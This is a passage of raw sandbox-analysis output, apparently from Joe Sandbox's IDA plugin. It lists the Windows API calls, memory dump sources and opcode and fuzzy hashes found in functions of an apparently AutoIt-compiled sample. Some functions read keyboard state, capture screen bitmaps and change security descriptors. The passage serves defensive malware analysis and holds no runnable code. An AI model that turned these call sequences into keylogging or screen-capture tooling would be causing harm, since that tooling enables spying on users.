                                                              • GetMenuItemID.USER32(?,00000000), ref: 00B1F0DF
                                                              • GetMenuItemInfoW.USER32(00000000,-00000001,00000001,?), ref: 00B1F113
                                                              • GetMenuItemInfoW.USER32(00000000,?,00000001,?), ref: 00B1F15B
                                                              • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00B1F193
                                                              • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 00B1F1C8
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                                              • String ID: 0
                                                              • API String ID: 1296962147-4108050209
                                                              • Opcode ID: b98d51718675a9259eccbf02860ec1fd105c39a1458983b9b06997e42254b9eb
                                                              • Instruction ID: 366972c81d4c6914fd1da07f0b31a5ef5292d40e1491560d58412929649b3a30
                                                              • Opcode Fuzzy Hash: b98d51718675a9259eccbf02860ec1fd105c39a1458983b9b06997e42254b9eb
                                                              • Instruction Fuzzy Hash: E381AF71104302AFD710CF14D885ABBBBE9FF88314F50496EF999A7291DB30D991CB62
                                                              APIs
                                                                • Part of subcall function 00AEABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00AEABD7
                                                                • Part of subcall function 00AEABBB: GetLastError.KERNEL32(?,00AEA69F,?,?,?), ref: 00AEABE1
                                                                • Part of subcall function 00AEABBB: GetProcessHeap.KERNEL32(00000008,?,?,00AEA69F,?,?,?), ref: 00AEABF0
                                                                • Part of subcall function 00AEABBB: HeapAlloc.KERNEL32(00000000,?,00AEA69F,?,?,?), ref: 00AEABF7
                                                                • Part of subcall function 00AEABBB: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00AEAC0E
                                                                • Part of subcall function 00AEAC56: GetProcessHeap.KERNEL32(00000008,00AEA6B5,00000000,00000000,?,00AEA6B5,?), ref: 00AEAC62
                                                                • Part of subcall function 00AEAC56: HeapAlloc.KERNEL32(00000000,?,00AEA6B5,?), ref: 00AEAC69
                                                                • Part of subcall function 00AEAC56: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00AEA6B5,?), ref: 00AEAC7A
                                                              • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00AEA8CB
                                                              • _memset.LIBCMT ref: 00AEA8E0
                                                              • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00AEA8FF
                                                              • GetLengthSid.ADVAPI32(?), ref: 00AEA910
                                                              • GetAce.ADVAPI32(?,00000000,?), ref: 00AEA94D
                                                              • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00AEA969
                                                              • GetLengthSid.ADVAPI32(?), ref: 00AEA986
                                                              • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00AEA995
                                                              • HeapAlloc.KERNEL32(00000000), ref: 00AEA99C
                                                              • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00AEA9BD
                                                              • CopySid.ADVAPI32(00000000), ref: 00AEA9C4
                                                              • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00AEA9F5
                                                              • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00AEAA1B
                                                              • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00AEAA2F
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                              • String ID:
                                                              • API String ID: 3996160137-0
                                                              • Opcode ID: c62f17a54ce9f114d68cb040b1d8bd36e4579b05d02eff489e43ba9378052223
                                                              • Instruction ID: e8a9786dc93e92f1cb1c4e761a81d8c3719856cd006eae119b8dd4de0f3a37cc
                                                              • Opcode Fuzzy Hash: c62f17a54ce9f114d68cb040b1d8bd36e4579b05d02eff489e43ba9378052223
                                                              • Instruction Fuzzy Hash: B3517071900249AFDF14DFA6DD95EEEBB7AFF14300F148129F911AB290DB34AA05CB61
                                                              APIs
                                                              • GetDC.USER32(00000000), ref: 00B09E36
                                                              • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 00B09E42
                                                              • CreateCompatibleDC.GDI32(?), ref: 00B09E4E
                                                              • SelectObject.GDI32(00000000,?), ref: 00B09E5B
                                                              • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00B09EAF
                                                              • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,?,00000000), ref: 00B09EEB
                                                              • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00B09F0F
                                                              • SelectObject.GDI32(00000006,?), ref: 00B09F17
                                                              • DeleteObject.GDI32(?), ref: 00B09F20
                                                              • DeleteDC.GDI32(00000006), ref: 00B09F27
                                                              • ReleaseDC.USER32(00000000,?), ref: 00B09F32
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                              • String ID: (
                                                              • API String ID: 2598888154-3887548279
                                                              • Opcode ID: 9709e40b8fa1c25406a6dc93c1252ae87518b48a136ad44663dbcf3daa2bf6a5
                                                              • Instruction ID: aee5d6d2eb8554c0456d7bd139f8e4dd663fe0a4e69b6ce8339b9ac46cf8bc9c
                                                              • Opcode Fuzzy Hash: 9709e40b8fa1c25406a6dc93c1252ae87518b48a136ad44663dbcf3daa2bf6a5
                                                              • Instruction Fuzzy Hash: D9513875900309AFCB14CFA8DC85EAEBBB9EF48710F14895DF959A7250CB31A941CB90
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: LoadString__swprintf_wprintf
                                                              • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                              • API String ID: 2889450990-2391861430
                                                              • Opcode ID: 1c1f83638b40a95e9976cc2253cec0bfe6727f6b3e6ab3b104f248e86696cc90
                                                              • Instruction ID: 267209cdcf27fdc8f47657000cfdee9450a664635c7135286f6e2947dda3973a
                                                              • Opcode Fuzzy Hash: 1c1f83638b40a95e9976cc2253cec0bfe6727f6b3e6ab3b104f248e86696cc90
                                                              • Instruction Fuzzy Hash: C6516A3180010DBADB15EBE4DE42EEEBBB9EF08350F104166F505721A2EB356F99DB60
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: LoadString__swprintf_wprintf
                                                              • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                              • API String ID: 2889450990-3420473620
                                                              • Opcode ID: fd598c719f2a3409482ef604b367a89ba0a99b591f17457a6b2ee8c579cb5ec5
                                                              • Instruction ID: 5822a0325ffcd1da0b4df4bfeabcf287c63688b46248250dab421a0bc867a039
                                                              • Opcode Fuzzy Hash: fd598c719f2a3409482ef604b367a89ba0a99b591f17457a6b2ee8c579cb5ec5
                                                              • Instruction Fuzzy Hash: 00516A31900209AADB15EBE4DE42EEEB7B8EF04350F104166F506731A2EA356F99DF61
                                                              APIs
                                                              • _memset.LIBCMT ref: 00AF55D7
                                                              • GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 00AF5664
                                                              • GetMenuItemCount.USER32(00B71708), ref: 00AF56ED
                                                              • DeleteMenu.USER32(00B71708,00000005,00000000,000000F5,?,?), ref: 00AF577D
                                                              • DeleteMenu.USER32(00B71708,00000004,00000000), ref: 00AF5785
                                                              • DeleteMenu.USER32(00B71708,00000006,00000000), ref: 00AF578D
                                                              • DeleteMenu.USER32(00B71708,00000003,00000000), ref: 00AF5795
                                                              • GetMenuItemCount.USER32(00B71708), ref: 00AF579D
                                                              • SetMenuItemInfoW.USER32(00B71708,00000004,00000000,00000030), ref: 00AF57D3
                                                              • GetCursorPos.USER32(?), ref: 00AF57DD
                                                              • SetForegroundWindow.USER32(00000000), ref: 00AF57E6
                                                              • TrackPopupMenuEx.USER32(00B71708,00000000,?,00000000,00000000,00000000), ref: 00AF57F9
                                                              • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00AF5805
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
                                                              • String ID:
                                                              • API String ID: 3993528054-0
                                                              • Opcode ID: 03deaf94c789c38460789debdb28f23441d15ff72e4d858049cbf85a6868b771
                                                              • Instruction ID: 5f26b1e48a5c549223d5f95b1a3fc7331728077fe2553228e180fb927d8904a3
                                                              • Opcode Fuzzy Hash: 03deaf94c789c38460789debdb28f23441d15ff72e4d858049cbf85a6868b771
                                                              • Instruction Fuzzy Hash: DE71C470A40A0DBEEB219BA4DC49FBABF65FF04364F284205F725AA1E1CB715850DB94
                                                              APIs
                                                              • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00B12BB5,?,?), ref: 00B13C1D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: BuffCharUpper
                                                              • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                              • API String ID: 3964851224-909552448
                                                              • Opcode ID: f7e69f5292547c1eb2d4bc9e4a4b8b64193a9302c8f0e76f3681c3025d6ca9b7
                                                              • Instruction ID: 2f868c65385d80596e56e58235022393b40ed4c5df5fad5fc9def38b127839a1
                                                              • Opcode Fuzzy Hash: f7e69f5292547c1eb2d4bc9e4a4b8b64193a9302c8f0e76f3681c3025d6ca9b7
                                                              • Instruction Fuzzy Hash: 3841603111424A8BDF00EF10E991AEB37E5FF62700F9144A8EC561B292FB74DE9ACB50
                                                              APIs
                                                              • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00B236F4,00000010,?,Bad directive syntax error,00B4DC00,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 00AF25D6
                                                              • LoadStringW.USER32(00000000,?,00B236F4,00000010), ref: 00AF25DD
                                                              • _wprintf.LIBCMT ref: 00AF2610
                                                              • __swprintf.LIBCMT ref: 00AF2632
                                                              • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00AF26A1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: HandleLoadMessageModuleString__swprintf_wprintf
                                                              • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                              • API String ID: 1080873982-4153970271
                                                              • Opcode ID: ec00ebb4c5afc8a93571e9f8e542932677012a272388a91306126a4a8a2dc75b
                                                              • Instruction ID: 115cd14b34308547bee1dd81ced08176cc8d0a22c26551fc22d5ec4d3ccac3df
                                                              • Opcode Fuzzy Hash: ec00ebb4c5afc8a93571e9f8e542932677012a272388a91306126a4a8a2dc75b
                                                              • Instruction Fuzzy Hash: B821393180021ABFCF11AB90DD4AFEE7BB9FF18704F04045AF516661A3EA75A628DB50
                                                              APIs
                                                              • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00AF7B42
                                                              • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00AF7B58
                                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00AF7B69
                                                              • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00AF7B7B
                                                              • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00AF7B8C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: SendString
                                                              • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                              • API String ID: 890592661-1007645807
                                                              • Opcode ID: 87e5c964b073d8cef2220f86333a5b9d37dbb1203b3b77fe0ff04e06619cf81e
                                                              • Instruction ID: a61dc09519b98670ac0ec555a63f244cabd1ea2875b03912f1bc8e25f47bb6f4
                                                              • Opcode Fuzzy Hash: 87e5c964b073d8cef2220f86333a5b9d37dbb1203b3b77fe0ff04e06619cf81e
                                                              • Instruction Fuzzy Hash: 3911B2A0A4025979D720B7A5CC4ADFFBAFCEB92F10F000559B412A30D2EEA40E45C9A0
                                                              APIs
                                                              • timeGetTime.WINMM ref: 00AF7794
                                                                • Part of subcall function 00ACDC38: timeGetTime.WINMM(?,7707B400,00B258AB), ref: 00ACDC3C
                                                              • Sleep.KERNEL32(0000000A), ref: 00AF77C0
                                                              • EnumThreadWindows.USER32(?,Function_00047744,00000000), ref: 00AF77E4
                                                              • FindWindowExW.USER32(?,00000000,BUTTON,00000000), ref: 00AF7806
                                                              • SetActiveWindow.USER32 ref: 00AF7825
                                                              • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00AF7833
                                                              • SendMessageW.USER32(00000010,00000000,00000000), ref: 00AF7852
                                                              • Sleep.KERNEL32(000000FA), ref: 00AF785D
                                                              • IsWindow.USER32 ref: 00AF7869
                                                              • EndDialog.USER32(00000000), ref: 00AF787A
                                                              Strings
                                                              Similarity
                                                              • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                              • String ID: BUTTON
                                                              • API String ID: 1194449130-3405671355
                                                              • Opcode ID: 276eab35ca0626b93870622389f14b6c29aec68533835e8cbdc55d97283df7d4
                                                              • Instruction ID: 13934caa3c483b0480229c556504258d1912f36f7a261ce16b2dbd58dd887780
                                                              • Instruction Fuzzy Hash: 3B2142B4204609AFE7115BB0EC89B3E3FAAFB44744F110014F609871B2CF719D90EB65
                                                              APIs
                                                                • Part of subcall function 00AB936C: __swprintf.LIBCMT ref: 00AB93AB
                                                                • Part of subcall function 00AB936C: __itow.LIBCMT ref: 00AB93DF
                                                              • CoInitialize.OLE32(00000000), ref: 00B0034B
                                                              • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00B003DE
                                                              • SHGetDesktopFolder.SHELL32(?), ref: 00B003F2
                                                              • CoCreateInstance.OLE32(00B3DA8C,00000000,00000001,00B63CF8,?), ref: 00B0043E
                                                              • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00B004AD
                                                              • CoTaskMemFree.OLE32(?,?), ref: 00B00505
                                                              • _memset.LIBCMT ref: 00B00542
                                                              • SHBrowseForFolderW.SHELL32(?), ref: 00B0057E
                                                              • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00B005A1
                                                              • CoTaskMemFree.OLE32(00000000), ref: 00B005A8
                                                              • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 00B005DF
                                                              • CoUninitialize.OLE32(00000001,00000000), ref: 00B005E1
                                                              Similarity
                                                              • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                                              • String ID:
                                                              • API String ID: 1246142700-0
                                                              • Opcode ID: 7e199364e695ffd3da2fd6ebf8339c23e076dbcbd3ab94b8d1c3e1716d8bcb49
                                                              • Instruction ID: 587efba5480ef39c1b514d6ddd942b8dd356ef4325e9af501e7e433520758ac4
                                                              • Instruction Fuzzy Hash: B0B1D775A00208AFDB14EFA4D989EAEBBF9EF48314F148499F905EB251DB31ED41CB50
                                                              APIs
                                                              • GetKeyboardState.USER32(?), ref: 00AF2ED6
                                                              • SetKeyboardState.USER32(?), ref: 00AF2F41
                                                              • GetAsyncKeyState.USER32(000000A0), ref: 00AF2F61
                                                              • GetKeyState.USER32(000000A0), ref: 00AF2F78
                                                              • GetAsyncKeyState.USER32(000000A1), ref: 00AF2FA7
                                                              • GetKeyState.USER32(000000A1), ref: 00AF2FB8
                                                              • GetAsyncKeyState.USER32(00000011), ref: 00AF2FE4
                                                              • GetKeyState.USER32(00000011), ref: 00AF2FF2
                                                              • GetAsyncKeyState.USER32(00000012), ref: 00AF301B
                                                              • GetKeyState.USER32(00000012), ref: 00AF3029
                                                              • GetAsyncKeyState.USER32(0000005B), ref: 00AF3052
                                                              • GetKeyState.USER32(0000005B), ref: 00AF3060
                                                              Similarity
                                                              • API ID: State$Async$Keyboard
                                                              • String ID:
                                                              • API String ID: 541375521-0
                                                              • Opcode ID: 82df0aed7eb81a02e35fe87831e64978c71212e7cf75425551e200ed6979fe0b
                                                              • Instruction ID: c384449093f63d692aa8e465cf6f1299d32e4caed96e8e43fe5003fcdeb942f4
                                                              • Instruction Fuzzy Hash: 3951A661A0478C29FB35EBE489117FABFB45F11384F08459EE7C2571C2DA949B8CC762
                                                              APIs
                                                              • GetDlgItem.USER32(?,00000001), ref: 00AEED1E
                                                              • GetWindowRect.USER32(00000000,?), ref: 00AEED30
                                                              • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 00AEED8E
                                                              • GetDlgItem.USER32(?,00000002), ref: 00AEED99
                                                              • GetWindowRect.USER32(00000000,?), ref: 00AEEDAB
                                                              • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 00AEEE01
                                                              • GetDlgItem.USER32(?,000003E9), ref: 00AEEE0F
                                                              • GetWindowRect.USER32(00000000,?), ref: 00AEEE20
                                                              • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 00AEEE63
                                                              • GetDlgItem.USER32(?,000003EA), ref: 00AEEE71
                                                              • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00AEEE8E
                                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 00AEEE9B
                                                              Similarity
                                                              • API ID: Window$ItemMoveRect$Invalidate
                                                              • String ID:
                                                              • API String ID: 3096461208-0
                                                              • Opcode ID: 081371f5a06cfcff993425ae863f1b758a141a21e4edb1371e5af664242b17a9
                                                              • Instruction ID: e163654f3b334f621e5736c74e566004c90d6fd86ed50dec4ca76a1f27c19851
                                                              • Instruction Fuzzy Hash: BA5110B1B00605AFDF18CF69DD96AAEBBBAFB88700F14852DF519D7290DB709D008B10
                                                              APIs
                                                                • Part of subcall function 00ACB9FF: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00ACB759,?,00000000,?,?,?,?,00ACB72B,00000000,?), ref: 00ACBA58
                                                              • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00ACB72B), ref: 00ACB7F6
                                                              • KillTimer.USER32(00000000,?,00000000,?,?,?,?,00ACB72B,00000000,?,?,00ACB2EF,?,?), ref: 00ACB88D
                                                              • DestroyAcceleratorTable.USER32(00000000), ref: 00B2D8A6
                                                              • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00ACB72B,00000000,?,?,00ACB2EF,?,?), ref: 00B2D8D7
                                                              • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00ACB72B,00000000,?,?,00ACB2EF,?,?), ref: 00B2D8EE
                                                              • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00ACB72B,00000000,?,?,00ACB2EF,?,?), ref: 00B2D90A
                                                              • DeleteObject.GDI32(00000000), ref: 00B2D91C
                                                              Similarity
                                                              • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                              • String ID:
                                                              • API String ID: 641708696-0
                                                              • Opcode ID: 1fbe6a94fc08c184beed7b0edf3d2d0a93755e238045396c4b8d9b6f35b75a07
                                                              • Instruction ID: 89b87c29f31a9f618cf3ad2ac9c2bb6be8d1948a537380ab19f47ec7f758f93e
                                                              • Instruction Fuzzy Hash: 1B617D30511610DFDB259F1CE98AB2977F5FB94711F26491DE44A97A70CB36A8C0CFA0
                                                              APIs
                                                                • Part of subcall function 00ACB526: GetWindowLongW.USER32(?,000000EB), ref: 00ACB537
                                                              • GetSysColor.USER32(0000000F), ref: 00ACB438
                                                              Similarity
                                                              • API ID: ColorLongWindow
                                                              • String ID:
                                                              • API String ID: 259745315-0
                                                              • Opcode ID: 69f215cacef3bd3a6148e8c0ccbd595a56dcf8c8377d78202877e08630171ac7
                                                              • Instruction ID: 69688350df9c81adad3f6cd8c601e466b2706dd58024242fefecd8847ddaefa0
                                                              • Instruction Fuzzy Hash: F541B2300145509FDF246F28E98AFB937A5EB05721F2642A9FD658F1E6CB328C41D731
                                                              APIs
                                                              Similarity
                                                              • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                                                              • String ID:
                                                              • API String ID: 136442275-0
                                                              • Opcode ID: 985b46aa3454325b7af8a4a88e80f75a45fa28074b19a5fddd04d5d75784d50e
                                                              • Instruction ID: f8dbdb403f0dd4a9c276965cc2d97f6ff633638b19aec78f5d3c3c1fc90ee927
                                                              • Instruction Fuzzy Hash: 93411B7684511CAECF61EB90CD86DDA73BDEB44300F0041E7B69AA2151EB71ABE88F50
                                                              APIs
                                                              • CharLowerBuffW.USER32(00B4DC00,00B4DC00,00B4DC00), ref: 00AFD7CE
                                                              • GetDriveTypeW.KERNEL32(?,00B63A70,00000061), ref: 00AFD898
                                                              • _wcscpy.LIBCMT ref: 00AFD8C2
                                                              Strings
                                                              Similarity
                                                              • API ID: BuffCharDriveLowerType_wcscpy
                                                              • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                              • API String ID: 2820617543-1000479233
                                                              • Opcode ID: b625dce8bf904759ce7c5b68d37894eed0fd7b473b259f6043ed051ed09a7ea6
                                                              • Instruction ID: dc2976b446e02df57f8629a610e38ddd2de30198fb517657ff749a9ca079ea43
                                                              • Instruction Fuzzy Hash: 33519F31108208AFC701EF54D982BBEB7E6EF84754F10892DF69A572A2DB71D905DA82
                                                              APIs
                                                              • __swprintf.LIBCMT ref: 00AB93AB
                                                              • __itow.LIBCMT ref: 00AB93DF
                                                                • Part of subcall function 00AD1557: _xtow@16.LIBCMT ref: 00AD1578
                                                              Strings
                                                              Similarity
                                                              • API ID: __itow__swprintf_xtow@16
                                                              • String ID: %.15g$0x%p$False$True
                                                              • API String ID: 1502193981-2263619337
                                                              • Opcode ID: 702f2a893139a7caab63119511a36f0e6e0de834f22e8eab881e2fc2b8253073
                                                              • Instruction ID: 425320f5a757739dc0843e6a85ee5add2ef7d270f6db4cd66db249ca29688539
                                                              • Instruction Fuzzy Hash: 5C41D671504214AFDB24DB78EA41FAA77F8EF44300F2044AEE54AD7692EA72D941CB10
                                                              APIs
                                                              • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00B1A259
                                                              • CreateCompatibleDC.GDI32(00000000), ref: 00B1A260
                                                              • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00B1A273
                                                              • SelectObject.GDI32(00000000,00000000), ref: 00B1A27B
                                                              • GetPixel.GDI32(00000000,00000000,00000000), ref: 00B1A286
